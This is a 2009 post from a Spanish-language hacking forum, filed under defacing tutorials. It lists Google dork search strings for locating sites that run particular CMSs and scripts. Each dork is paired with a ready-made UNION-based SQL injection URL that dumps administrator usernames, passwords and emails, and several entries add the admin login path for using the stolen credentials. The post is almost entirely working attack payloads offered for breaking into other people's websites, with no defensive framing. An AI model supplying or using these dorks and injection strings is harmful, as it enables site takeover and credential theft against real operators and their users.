ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
13:08:48 21/12/2014
¿No estas registrado?
Login: Clave:
17 Usuarios en línea: 0 registrados, 17 invitados.
Conéctate y verás los usuarios en línea
Tema: SQL Inyection
    Responder
Todos Los Foros -> Defacing -> Tutoriales -> SQL Inyection
Autor Mensaje (Ver Versión para Imprimir)
k_t_den
Aprendiz nivel 3

Mensajes: 79
Registrad@:
01/12/2008
Estado: Desconectad@
SQL Inyection

Hola,
aqui les dejo unas inyecciones SQL

--------------------------------------------------------------------

DORK 1 : allinurl: "index.php?go=subcat"

DORK 2 : powered by SSWD


EXPLOiT :

index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*


admin login=admin/login.php (para loguearse)

****************************************************

DORK 1 : powered by Site Sift

DORK 2 : allinurl: "index php go addpage"

DORK 2 : allinurl: "index.php?go=detail id="


EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

EXPLOIT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*


ADMiN LOGiN::admin/login.php


SALUDOS A TODOS......EVA


724CMS + "Version 4.01"



index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users--

-----------------------------------------------------------------------------------------------------------


allinurl: "index.php?p=gallerypic img_id"
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user

EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user

-----------------------------------------------------------------------------------------------------------
   DORK 1 : allinurl: "index.php?mod=archives"


EXPLOiT 1:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*

-----------------------------------------------------------------------------------------------------------


DORK 1 : "Powered by Smoothflash"

DORK 2 : allinurl: "admin_view_image.php"


EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users



DORK 1 : allinurl: \"sections.php?op=listarticles\"secid

DORK 2 ; allinurl: \"sections php op\"


EXPLOiT :

sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd)/**/from/**/authors/*


sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd),1,2,concat(aid,0x3a,pwd)/**/from/**/authors/*



sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd),2/**/from/**/authors/*



sections.php?op=printpage&artid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd)/**/from/**/authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : \"Powered by Esy\"


EXPLOiT 1 :

sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*

EXPLOiT 2 :

sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"fundlinkllc.com\"

DORK 2 : \"Fundlink LLC\"


EXPLOiT :

showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
-------------------------------------------------------------

DORK 1 : allinurl: \"index.php?go=detail\"

DORK 2 : allinurl: \"Powered by Com Endeavors\"

DORK 3 : \"Emlak NET Kiralik ve Satilik Emlak Sitesi\"

*****DORKS******

allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"


EXPLOIT :

index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--

admin panel login:

admin/login.php    hay muchas
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"index.php?pgid\"cat_id


EXPLOIT :

index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "showCat.php?cat_id"



EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "modules/photo/viewcat.php?id"

DORK 2 : inurl:photo "powered by runcms"


EXPLOIT :

admin

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
-----------------------------------------------------------------------------------
DORK 1 : allinurl: "modules MyAnnonces index php pa view"


EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT>

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

-----------------------------------------------------------------------------------

DorKs 1 : "2007 BookmarkX script"

DORKS 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

o

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1

-----------------------------------------------------------------------------------

DORKS 2 : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(5Cool,login,password),444+from+admin_login/*


-----------------------------------------------------------------------------------

DORK 1 : allinurl: \"recipe.php?recipeid\"

admin login=siteadmin


EXPLOIT :

recipe.php?recipeid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*

-----------------------------------------------------------------------------------
DORK 1 : "powered by niccell"

##admin login=siteadmin


EXPLOIT :

list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*

----------------------------------------------------------------------------------

DORK 1 : allinurl:\"print.php?recipeid\"

admin login=siteadmin


EXPLOIT :

print.php?recipeid=777%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(login,0x3a,password)/**/from%2F%2A%2A%2Fadmin_login/*where%20admin
-----------------------------------------------------------------------------------------------------------


DORK 1 : allinurl:"list.php?pagenum"catid

admin login=siteadmin


EXPLOIT :

list.php?pagenum=0&catid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*
24/07/2009 22:14:05 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)

Copyright ForoHack.com